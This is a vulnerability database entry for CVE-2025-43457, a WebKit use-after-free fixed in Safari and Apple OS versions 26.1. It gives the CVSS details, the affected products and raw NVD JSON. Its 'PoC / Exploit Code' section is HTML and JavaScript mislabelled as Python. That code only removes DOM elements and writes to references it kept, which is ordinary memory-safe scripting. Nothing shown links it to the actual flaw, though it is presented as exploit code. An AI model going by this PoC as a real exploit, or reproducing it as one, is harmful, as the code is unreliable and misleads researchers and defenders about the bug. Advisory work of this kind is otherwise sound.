Security Vulnerability Report
中文
CVE-2025-43457 CVSS 6.5 MEDIUM

CVE-2025-43457

Published: 2025-11-04 02:15:51
Last Modified: 2026-04-02 19:20:50
Source: [email protected]

Description

A use-after-free issue was addressed with improved memory management. This issue is fixed in Safari 26.1, iOS 26.1 and iPadOS 26.1, macOS Tahoe 26.1, visionOS 26.1, watchOS 26.1. Processing maliciously crafted web content may lead to an unexpected Safari crash.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:* - VULNERABLE
Safari < 26.1
iOS < 26.1
iPadOS < 26.1
macOS Tahoe < 26.1
visionOS < 26.1
watchOS < 26.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-43457 PoC - Use-After-Free in WebKit // This is a conceptual PoC demonstrating the vulnerability pattern // Note: This PoC is for educational and security research purposes only <!DOCTYPE html> <html> <head> <title>CVE-2025-43457 PoC</title> </head> <body> <h1>CVE-2025-43457 Use-After-Free PoC</h1> <p>This PoC demonstrates the use-after-free vulnerability in WebKit.</p> <script> // Create objects that will trigger the UAF condition function triggerUAF() { // Create elements that can be garbage collected let elements = []; for (let i = 0; i < 1000; i++) { elements.push(document.createElement('div')); } // Force garbage collection if available if (window.gc) { window.gc(); } // Try to access elements after potential collection // This pattern may trigger the use-after-free condition try { // Manipulate DOM to create dangling references const container = document.createElement('div'); document.body.appendChild(container); // Create references that may become dangling let refs = []; for (let i = 0; i < 100; i++) { const el = document.createElement('span'); container.appendChild(el); refs.push(el); } // Remove elements while keeping references container.remove(); // Attempt to access removed elements // This may trigger the use-after-free for (let ref of refs) { ref.textContent = 'triggered'; } } catch (e) { console.log('Exception occurred: ' + e.message); } } // Run the trigger function triggerUAF(); // Force crash for demonstration (commented out for safety) // Crash handling would be browser-dependent </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43457", "sourceIdentifier": "[email protected]", "published": "2025-11-04T02:15:51.120", "lastModified": "2026-04-02T19:20:49.577", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A use-after-free issue was addressed with improved memory management. This issue is fixed in Safari 26.1, iOS 26.1 and iPadOS 26.1, macOS Tahoe 26.1, visionOS 26.1, watchOS 26.1. Processing maliciously crafted web content may lead to an unexpected Safari crash."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "CFF118CE-3F13-43BE-B250-5579E1C842EB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "6D51AEDC-9086-4010-B3BF-C652D65D09C8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "3981A7BE-BC98-4C6F-AE38-D68839368925"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "7DFD3616-65CA-4E5C-849C-3C20ACBCB610"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "9F9D7F76-13FB-407C-94E5-221B93021568"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125632", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125634", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125638", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125639", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125640", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.